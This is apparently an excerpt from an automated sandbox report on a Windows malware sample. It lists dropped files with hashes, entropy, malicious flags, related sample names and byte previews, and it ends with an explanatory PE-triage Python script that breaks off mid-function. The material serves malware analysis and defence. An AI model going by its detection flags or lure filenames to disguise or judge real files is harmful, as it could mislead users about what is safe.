                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:yoWq3doKVKbYeTjqsdmN0Yp+G51TlB4RVSNYj8:yeINdmN0A+G5TB46f
                                                                                                                                                                                                        MD5:8E72C193AF73C259F423EE05499B566B
                                                                                                                                                                                                        SHA1:17EF3655823771E35959D0F7DAEF7D130B7E2FBC
                                                                                                                                                                                                        SHA-256:3A5656609CDA0708F8F76EBC101ABD223685ADD36C8BCFC36B85F7C247F4661E
                                                                                                                                                                                                        SHA-512:7D42C95773BA148BE5551E2807E2850E944558FF2449F207434E78C00F0384A4BC99AB88A84C8CE477C54A46A9A99A3235B00DCCCAC94A5850424AACA2923C4B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:t...............@..]...E.....^..Q.w7.o.......#/...@J...................c..q...J......x......B..^...4........c........q)...t../0.(..T......p...........{........_...........L>.L.j..a.......g.........(:p~.~.......L.]ax.....M...........i?..!..^.....~...k...f..;....................o......=..........l..........u.....r.!.65.........:........>...(.....1.....*...............w......a...A.....?....................`.........H...w)..Z ."...s..........Q..Z...............m..W..a............g..%.........v........<.../........H.......3...G...U...C}..:.....}F.#.........%.........o....7...........6.q......!d................j.~,..D.B....f......i.]...Y.........0.......a..O..*.....*...[....<......R.....EqK...............v.........b....5......|M....ln.......,G.E...J......T..g...p0.....t...?.......).......Zw.......a...2............................&... ...).......j.?.......r#..........Y..M.u.h......../.T?.............x....o..7...I..............Z...........n...............T....'...........2..)..U...
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        File Type:DOS executable (COM)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):169527
                                                                                                                                                                                                        Entropy (8bit):4.952881044983686
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:qzve04Mp9bVwS7h0cs0oRoVQzOsxdMh6Kh4q9FfQ7P:qzve0469bVp7+cs0oRoVQFMFz9lQ7P
                                                                                                                                                                                                        MD5:9C02DD0CDE6224AF894B17AE3C345FBC
                                                                                                                                                                                                        SHA1:4D5E753B3EE5F52549ADD9E60180E2534DA32484
                                                                                                                                                                                                        SHA-256:49DCDF0CE96754B433C373ADBBA4B5B8B048F7E5DD1A0F9424500B79636D4722
                                                                                                                                                                                                        SHA-512:E4B47319460911D3CAD2BA9D433C2B8C4AED414A5E85F7B427CA8E0AC0436CCF99C0D46BFDF1D8695C14F6EB06447961545837B23081E392F77796FCC243EEF1
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                        • Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious, Browse
                                                                                                                                                                                                        • Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious, Browse
                                                                                                                                                                                                        Preview:...|..[...Q......o........w........)..............6.....e..).>..#.S..@....#................[A.....1......G........^..N`+.....R....9.........'.o......,..............J...................H .......x.....g...Q...7..8.'........Q..^...Y..$....^f..r....?..;.E......o.wG.........x...............e..:=.........m..9...J..)%.ZV....?...C;.p.........>..=#......5T.............v3..=.c.............[......./...............$...=............v....?...........6....C...|....CQ.z.V?".P/...................Q..x............].....r`.h.....\........m......?.....3.......B..[....\.a.;.c.&........U.-..I.....:...)..1................G...U..f......q..}....m...........y..IB.m..m.....b...V..a...?..P..S......S..IE.......].............i.....l...w1.{...t....k........:........W-.&....wU....R..........Z;j........8...:.......,.[.........!.q.._0.......l..\..................^.T..........1........W.D..i....*........+}.....@..h......\.....\.D.....ns+@...r..........a..c....L...r......\..@.....................%.....C..........
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (13984), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13984
                                                                                                                                                                                                        Entropy (8bit):2.7577896446377776
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:zF4Gx8XqsWEe8i9I0N4Ph+69oQoMF/+fKw6zWcXemA9Mv0XW2Cfvmalb5QX+pbUd:hI/WEeektrqmMchO1QX+pMQXWk0J8rrU
                                                                                                                                                                                                        MD5:635F15EF03686F7DD4EAE096777F635B
                                                                                                                                                                                                        SHA1:830A276EA663A327B56DC76A31AE261A1ADFDA32
                                                                                                                                                                                                        SHA-256:4591820B6484BACE915BB3DBE4B2495F90BAA2CC71D0C4C4325C117F85AF0CEB
                                                                                                                                                                                                        SHA-512:F006A0672551C218E0DFDBBE2E0855EE1CAF548FA3C941FF50BA48D99FE6189E1B95142C65C18B8B523C1FE08633346A0E7B039153183D446109C627B1452722
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview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
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):111653
                                                                                                                                                                                                        Entropy (8bit):4.93540148122626
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:mvdp11Sp0Ejgb5pVOTZGqLFXChIJf2BNjRWJbh8ocP86aNcURe6x+V3wtrQxR/NU:YAjgb5niZGqLt4y/n9/E/NUB6SHSu
                                                                                                                                                                                                        MD5:4705EA0CD3C9EB5AE1DD9CA841BAFCEE
                                                                                                                                                                                                        SHA1:FA3486F073CEDF03736F84A2363617D362CB5216
                                                                                                                                                                                                        SHA-256:6169643668DDA3C54B676C83B8F5658E54034776EB3AB94020F3F1E256A32E9E
                                                                                                                                                                                                        SHA-512:0B7A0BEE222771E8F7415B3F70ED9720235A9A0F0224918F055D714037D00D65D2F2FFDF75959ADB9BEA704A473C86B1377C7D6C904DEEAFA057E19F086224C1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:.............]......c8........_...............TS..<:..,..O.:....................|...u..V.7....3......a..I.=................U....Z.v.....{~.....z..........,....'...n..........A.u.....=m.........p..c.;Qh....j.?............9........&..O...U........N.........7........2..Q.k.....fV..p._....+.}.. ?......U.D.p.....2".....!..KF."z...........2.......................v..5.d*.K....A............f..F..J......m.c............../)......>..=.....D.......#G..y..........m......[...ZFf.......n...............gf....Q..RD.......'6........K.....+..................1.}.....*..........A................"#.u.....{.....+.........N.......[..y_..........g........@.....`...s..e....x.......+......./...k.?.G..:e...C^..:FJ`...........................9...2...z~....P.......'.F.....#....;..s...B. .l..........................#....;.%....w...........af"...!....S.v.W........u...V .......N..W...........J..............)..!..............Y.>.....D....q......*.).............$......>,.......7.............8..%.?,...pn....9..
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):204058
                                                                                                                                                                                                        Entropy (8bit):4.94163303143438
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:v4lCMPvKDfICmKzL1moIwMhLj1FSRfZVikVeUpoNVg1OY9jzj3dw1cl:AsMXKruKzL1hpMhLjmNZVip9HgX9jHTl
                                                                                                                                                                                                        MD5:610D7B814D2CC4BB297624DBAB33292E
                                                                                                                                                                                                        SHA1:9D9B981E4F121E57B716D6FF4CB25F63599B1A4B
                                                                                                                                                                                                        SHA-256:E4AE60142AE58975799D5BCF244118307EEC7B1227429BBDAC6A64C36AADD64F
                                                                                                                                                                                                        SHA-512:0050666C6310289577416AE891E5B001323C72A4A3C206F1AB7A31E53313837509EF593EA861419113D3527BC89377E90C2D8718BD1A27EC8BCA895D82DB2220
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:....E...........k.h....&.........8....=}W..................LZ....r....I............k......!C................O..........^.!.....3f.h.................u$.............W...]..........V...S...Z..P......]..D..B....]^.........................o..........h......R.........\.............p.M..O....YI.m......../....i.........l...q..|...9m.r...K...........S.J.....Z..e...C...xwU............E.....u.W.:.....\...c.a.......c4......O.......d......4.....Z_.................K...J..Rs~.......'.t.$........"..%.........P...U>......t.0........................P.............0C...tH......................\....(7....._.4...^..........u...........M..{.............o.....k...7...../......../..........................7.......><.................^........2......r..*..................>..R.{..G.3................I........'..mo...........n..........l...y...................s*..%.........o.7M..}.......}.....b....C.......Sm..k:.6..w..A$.......hv.. &......%......W.}.f....$......r.v.............x:.....y9.........=......V.
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):203330
                                                                                                                                                                                                        Entropy (8bit):4.9390657330991266
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:bZr1TrewPG0EeDsOf6nqf6wIqdXIN/fjlWJJWSEu/DanH0/:bZrRreCG01f6IxI6YNXjlWeZA
                                                                                                                                                                                                        MD5:BB9867C6189B3E706EF667FC44F3D54C
                                                                                                                                                                                                        SHA1:1FB02D3A6474CC824C507152C07D69D9536BD33A
                                                                                                                                                                                                        SHA-256:255AC04B1B8C27FBAFC5BD4318145779B5C42C73E7F92B2182406F930E093F16
                                                                                                                                                                                                        SHA-512:3ECDB5642AB2173266BDFB9EEBE5FF57594A8A695EB3EE4B67886DF4D71601B902F881E020A630FCAAE93F6A174B11750B7FAAEB78E63AB2F1C7AA9C6B3CED05
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:).q..........o.......?.q@...".....2..v....A.........<h.....2C.F....v6&(.B...|...T........".~.......... ).......0:...........z..2P........~.........h.)......s....eV......................Ms....-9A....,.....tG...9......]..L.y...p6i........3.)f|...U.....vM.K.s....3.......c.(...u(...............Y...1............."....;.....i........4...v..T}...x...y.0....4....Vc....4.................EB......\..z...d........................,.....a......../...*..t(..V...&.................w..z.M........mv...iT.........S...6......(..<..'...g.....n{.........f.............d......k............!...#.b.........T....{........f.....}.=......\..F...5...B..A..........l.O.n:..................8......S.....'....h...E................................:B.....I.....@.4......q........}.v9H..rq......K#.N..8........>[..L...........`\.@..................u..{.......;.......&g.....PY........{...xr.X.....@e...n...........`..........d..0....[xr......'q.9...*.G.."B.K..........H............e...........R..t.....-....k..%
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):123394
                                                                                                                                                                                                        Entropy (8bit):4.946073104309169
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:v1cGJKLh5mhUHnbFvvDbyIGENCzp/Ck3JSgSMtO:dRKL6hyJjZDwpdZSxwO
                                                                                                                                                                                                        MD5:57942F8C67010250D2611CEC16555152
                                                                                                                                                                                                        SHA1:520F0297C889EFEAA7DABFCA379638C98C834E92
                                                                                                                                                                                                        SHA-256:9DA3FDC70176A73642C112C497976E81ED833B6D478EF65C9954F8B04723FC76
                                                                                                                                                                                                        SHA-512:677E39EE0E5EF52A0C619DB3F4DDC9C378D0B2AF32BB2CE8A8D66A12BB474D66EA43F7EE1313D7FCF294B7C45C4D7CE71438B55122E662C44DE7B043C1E48FAD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:............7F...c...-.5....;.|......G...z.....i............%;.1.+.....P........d...K..=.........q.........3..... ..J...&..%!c.1"...z.....[..d........i........{.......?..._mV...:<m.....s.K...[...u..~...k..B.S..........f........a....j.0\P..O..n.L.*...............O.............L......(#....K.........&.r>....N8..._......@m....~..............=.1H.........;....R.........9...........A.................B....T.'./.. ..............w...<...a..)...@.......+....@......... ........................I...........9.x......`.........(..Nc.............../......x.......6............<.......................s...J...............R....C.>I...6..?...W....S'.....x..........\..9.\......v.g*#.......e.........N..................M...C.}............R....F@.....?.I.......b.........i....I.......1.D.........0..D.g........@..._.....S..x.E....."..8..c.............1... j..P.......G...}...{...s.....s......z.................rj.2.......7..4......P>w.....@3...........u.t..................4......I..~......q....z....O.
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):143731
                                                                                                                                                                                                        Entropy (8bit):4.932449070514557
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:+VEdch8WpNKNKgVV8F5+ezpmQs0VZzPkMhy8Y:+Bh8WpNAKgIzpls0DzPkMhQ
                                                                                                                                                                                                        MD5:6E6292F29F97CB099E86530BF554070F
                                                                                                                                                                                                        SHA1:0C2CA75911E7E4EA87CC6FE549BBD114B1BF958E
                                                                                                                                                                                                        SHA-256:A7F941F4A6D06D1B3956298ADAA5F009F4A34B96B0C373CEC34D371A6A482DE1
                                                                                                                                                                                                        SHA-512:2703D1BF2BB5BA365ABF833A9F7D7345B097CDF033CA0985A58E6CEE2ECF5A7243CA8055429E11BD4510D21D74CB3F2088E6E9E111C7EC1969DE8DBA9C00F4BE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):112456
                                                                                                                                                                                                        Entropy (8bit):4.947252102362902
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:qEdHq0bL67Tj15njc8QBcAPUn2c/IGkjrET:3bL67Tj1VdQHPS2VET
                                                                                                                                                                                                        MD5:5803B9ED2388D5BE0FDB1CB71C25C24B
                                                                                                                                                                                                        SHA1:5FCFADF3CF58ABF517555F2C8C0B37EDD6E1624C
                                                                                                                                                                                                        SHA-256:96FD7A5C9B26669606D551286B38648DEACB025C664BD62102CDED2EC3543D99
                                                                                                                                                                                                        SHA-512:0401C31CD900FDF9EA2E812ABFA4544F445D4A7521D7E4CC4983441A5E6AA7D4F7F98C05606E0300AE8315EEF9A3F432093345E98D90E4D4B8D49F7A5EB97F14
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):183697
                                                                                                                                                                                                        Entropy (8bit):4.922506908512051
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:iESZ53o/sRtTzP5xQyTXZTuLGkTNt8PahqoEN7RB3g2NEsfeJ:sD3omtTjjbZ6Lx5tdqoE1RtgbsfeJ
                                                                                                                                                                                                        MD5:A76AF828FEED0119F3B48B879AA6475B
                                                                                                                                                                                                        SHA1:7115B5170F61B3F1AEAC0C35828399702D911A44
                                                                                                                                                                                                        SHA-256:04B3CB7B2862551FB95142E5047FA259B8EDB90B37773DE6A1D5B5AEA33096A0
                                                                                                                                                                                                        SHA-512:09DFA9552F4824C880EA2F18BA06EF405503C359657CFE3937C417D35DD40A2A1992A46C36C1E0AE1EF0722ED30B54009367937B467C1602367C4FC388BED955
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):175473
                                                                                                                                                                                                        Entropy (8bit):4.952914805781313
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:OXiPz6oRIsUlocyoU+rtDkXMZP1EFm7lvU8oujiri5jI1avBQ:KirV2BA0rPn7lvSujiriGsG
                                                                                                                                                                                                        MD5:8C233AF8B71E56514846C89E3B571E9C
                                                                                                                                                                                                        SHA1:5C426C0E7703DBDDA55C5310E69B27A3B7A68AC5
                                                                                                                                                                                                        SHA-256:DD151C263E741799C25331C54F70E0146C19406377E20C5DDE7B8E3ACEF0A0CE
                                                                                                                                                                                                        SHA-512:058B6FAE8FE2A712F2D62CF655BFB0F36767FA5A8839133ADEE11B90C26F4FE9F828EA7ACD13FDBC3B925315B36E2D0DD60C6BD2F3A52FE7D49B2FAC4201AE3D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):188689
                                                                                                                                                                                                        Entropy (8bit):4.943382218928104
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:XaETShy5IJyrhnjzeYXEN059gRDreOGO0udKYrpbNkUHoS+ORnGAq+jYe0KncM:1Shy5IJyrZjzTXE82hFhxJpZNBYe0KcM
                                                                                                                                                                                                        MD5:134F441414B62AB7CA948B58E3017AAF
                                                                                                                                                                                                        SHA1:88CFA925BA4D4E7CD5D13E5944286FABA5E75644
                                                                                                                                                                                                        SHA-256:B03D43C07DD48241794D349DEC1D37DACF9742464F44486011C8E508E5355D2B
                                                                                                                                                                                                        SHA-512:ECA08F9A8028480818DBAF25856779CE00461B4FF4164EF2C252B72E5683B3E771CBFABB310C92D258E7E2F393FAA2AFAD52E139FCBC49A47E37843FA9E718F2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):181362
                                                                                                                                                                                                        Entropy (8bit):4.94529009320029
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:QD+CT+IAaYOlQtC9HhXN9KMp0UcUZktgGMGiSq7yX7sHvMpQovElSS463/:CaIAaPaQD7KM1clBM9MLsivTS4s/
                                                                                                                                                                                                        MD5:F4F5F4A46EF121DBAAA78911C1143457
                                                                                                                                                                                                        SHA1:60348A97143F5FB9FEED10659490CD63913FD1B8
                                                                                                                                                                                                        SHA-256:93F1E284240AE539D29AB87F0FE38E5EFED31B1FD701F7C23B65139393F6D29A
                                                                                                                                                                                                        SHA-512:A35545308259070A52D852A6A217274476BE2737419A2D4A9A8B4427A54844FB982F804563F3D67BDF83FCA699E06F9D0D4DD5CB907CB3267C334F247B2EFCC3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xdd1e20aa, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):41943040
                                                                                                                                                                                                        Entropy (8bit):1.3253013643546145
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24576:qdz8CUrKZhY645tP8fY9MkvvvLWWmbKmVEPDQgGEvg9joBSg/Jk7wO7u2s0lfoBg:/rKZheWfY9ljrPDQgGmIu2
                                                                                                                                                                                                        MD5:299C43B68384EFCF12A9BB6AA60E4277
                                                                                                                                                                                                        SHA1:D457B0EF6015D56AF9A7AF74C7F5DACA01B8AE07
                                                                                                                                                                                                        SHA-256:65028CC0C9DDED9B31E0C5A442DF295AFC2F7BC4728B80B3C99EDC9F42DB8039
                                                                                                                                                                                                        SHA-512:E9E180D3FF660BF477CE3FDE36B625E53E0351D610BD0A925DC96E20506F481D77BF426EB42A6C733BDC1E404355EA344A57E8EF99354A5D9A028BC0B9E0AF37
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\SMGS-RCDU5010031.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7680
Entropy (8bit): 5.220213965432121
Encrypted: false
SSDEEP: 96:8e3k1LFJaO1/radJEaYtv1Zs4lkL8y3A2EN8Cmy3uTF4j7J3kWyy/:t0TJa2roqJyA2EN8diuTSje
MD5: 5DA88848798426643F9810237B58937D
SHA1: E1830DCA870437116B93DECBA8D0BA81F1056D65
SHA-256: 27D3E3E359E1E04B173277221055D043E2F3BAAF78A5D6F7E3A0A5DFCB96222C
SHA-512: 859D0FEF023B6FB9C41589E4AA5BCFC23259639AAAD2FB51E1304725D6E28852BD6B6A68FFCA8C6A20ADAE4D735E6A03620890036ED57095F40318804153F586
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View (other analyses in which this file was seen):
• Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious
• Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious
• Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious
• Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.W.p.9Cp.9Cp.9Cp.8C@.9C..dCy.9C$..Cq.9C$..Cq.9C..=Cq.9CRichp.9C........PE..L....z.W...........!................"........ ...............................`.......................................$....... ..d............................P....................................................... ...............................text...D........................... ..`.rdata....... ......................@..@.data........0......................@....reloc..v....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\SMGS-RCDU5010031.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11776
Entropy (8bit): 5.6557532861400945
Encrypted: false
SSDEEP: 192:eK24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlASl:u8QIl975eXqlWBrz7YLOlA
MD5: 0FF2D70CFDC8095EA99CA2DABBEC3CD7
SHA1: 10C51496D37CECD0E8A503A5A9BB2329D9B38116
SHA-256: 982C5FB7ADA7D8C9BC3E419D1C35DA6F05BC5DD845940C179AF3A33D00A36A8B
SHA-512: CB5FC0B3194F469B833C2C9ABF493FCEC5251E8609881B7F5E095B9BD09ED468168E95DDA0BA415A7D8D6B7F0DEE735467C0ED8E52B223EB5359986891BA6E2E
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View (other analyses in which this file was seen):
• Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious
• Filename: RC_S23_3274 Or_amento ADP 231019_5_5009.exe, Detection: malicious
• Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious
• Filename: IMG-2023010_WAA646737kendelsesordningenBalneo.exe, Detection: malicious
• Filename: 23IK-1799-REF09NSEP-GERMAMY-TBILIS.exe, Detection: malicious
• Filename: 23IK-1799-REF09NSEP-GERMAMY-TBILIS.exe, Detection: malicious
• Filename: FhmDxxpEZM.exe, Detection: malicious
• Filename: FhmDxxpEZM.exe, Detection: malicious
• Filename: FfpHp8F4pY.exe, Detection: malicious
• Filename: FfpHp8F4pY.exe, Detection: malicious
• Filename: mgtq5agGDy.exe, Detection: malicious
• Filename: mgtq5agGDy.exe, Detection: malicious
• Filename: AlKwm5EGna.exe, Detection: malicious
• Filename: H66BPNLUSu.exe, Detection: malicious
• Filename: H66BPNLUSu.exe, Detection: malicious
• Filename: AlKwm5EGna.exe, Detection: malicious
• Filename: Lithoglyptic.exe, Detection: malicious
• Filename: Lithoglyptic.exe, Detection: malicious
• Filename: 5283079616_INV_SZV_WJG_001_20230830_180210.exe, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....z.W...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\SMGS-RCDU5010031.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 9728
Entropy (8bit): 5.099620413135966
Encrypted: false
SSDEEP: 192:oWa8cSzvTyl4tgi8pPjQM0PuAg0YNyZIFtSP:DaBSzm+t18pZ0WAg0RZIFg
MD5: D6C3DD680C6467D07D730255D0EE5D87
SHA1: 57E7A1D142032652256291B8ED2703B3DC1DFA9B
SHA-256: AEDB5122C12037BCF5C79C2197D1474E759CF47C67C37CDB21CF27428854A55B
SHA-512: C28613D6D91C1F1F7951116F114DA1C49E5F4994C855E522930BB4A8BDD73F12CADF1C6DCB84FC8D9F983EC60A40AC39522D3F86695E17EC88DA4BD91C7B6A51
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L....z.W...........!.........0...............0.......................................................................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..v............"..............@..B................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\SMGS-RCDU5010031.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 6656
Entropy (8bit): 5.140229856656103
Encrypted: false
SSDEEP: 96:J7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN738:HbGgGPzxeX6D8ZyGgmkN
MD5: 01E76FE9D2033606A48D4816BD9C2D9D
SHA1: E46D8A9ED4D5DA220C81BAF5F1FDB94708E9ABA2
SHA-256: EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
SHA-512: 62EF7095D1BF53354C20329C2CE8546C277AA0E791839C8A24108A01F9483A953979259E0AD04DBCAB966444EE7CDD340F8C9557BC8F98E9400794F2751DC7E0
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L....z.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
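The dropped-file records above give three pieces of header-level triage for each PE32 DLL: the file type (PE32, DLL flag set), the section layout that is visible in the Preview bytes (.text, .rdata, .data, .reloc, and .rsrc in one of them), and an 8-bit entropy figure. The "L" that follows "PE" in every preview is the low byte of the COFF Machine field, 0x014C for i386. The following is an added example, not code from the Joe Sandbox report or from the sample, that reproduces that triage from raw bytes: it walks the DOS header to e_lfanew, checks the PE signature, reads the COFF header to decide EXE versus DLL (IMAGE_FILE_DLL, 0x2000) and PE32 versus PE32+, lists section names, and computes Shannon entropy in bits per byte, which is what "Entropy (8bit)" measures (the main sample's 7.916 against roughly 5.1 to 5.7 for the plain DLLs is the usual signature of a compressed NSIS payload). `build_minimal_pe` and its fixed field values are a constructed fixture so the script runs offline; they are assumptions for the demonstration and not a reconstruction of any dropped file.

```python
import math
import struct
from collections import Counter

IMAGE_FILE_MACHINE_I386 = 0x014C   # low byte 0x4C is the "L" after "PE" in the report previews
IMAGE_FILE_DLL = 0x2000            # IMAGE_FILE_HEADER.Characteristics flag for DLL images
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte (0.0 .. 8.0); this is the report's 'Entropy (8bit)' figure."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_triage(data: bytes) -> dict:
    """Header-only triage: machine, PE32/PE32+, DLL flag, section names, whole-file entropy."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not at e_lfanew (corrupt or not a PE)")
    coff = e_lfanew + 4
    (machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = 0
    if opt_size >= 2 and opt + 2 <= len(data):
        magic = struct.unpack_from("<H", data, opt)[0]
    names = []
    for i in range(nsections):
        off = opt + opt_size + i * 40          # IMAGE_SECTION_HEADER is 40 bytes, Name comes first
        if off + 40 > len(data):
            break                              # truncated section table: report what is present
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return {
        "machine": machine,
        "pe32plus": magic == PE32PLUS_MAGIC,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "timestamp": timestamp,
        "sections": names,
        "entropy": shannon_entropy(data),
    }


def build_minimal_pe(is_dll: bool,
                     section_names=(b".text", b".rdata", b".data", b".reloc")) -> bytes:
    """Constructed fixture (an assumption for this demo, not one of the dropped files): header-only PE32."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew right after the DOS header
    characteristics = 0x0102 | (IMAGE_FILE_DLL if is_dll else 0)   # EXECUTABLE_IMAGE | 32BIT_MACHINE
    opt_size = 224                                                 # size of a PE32 optional header
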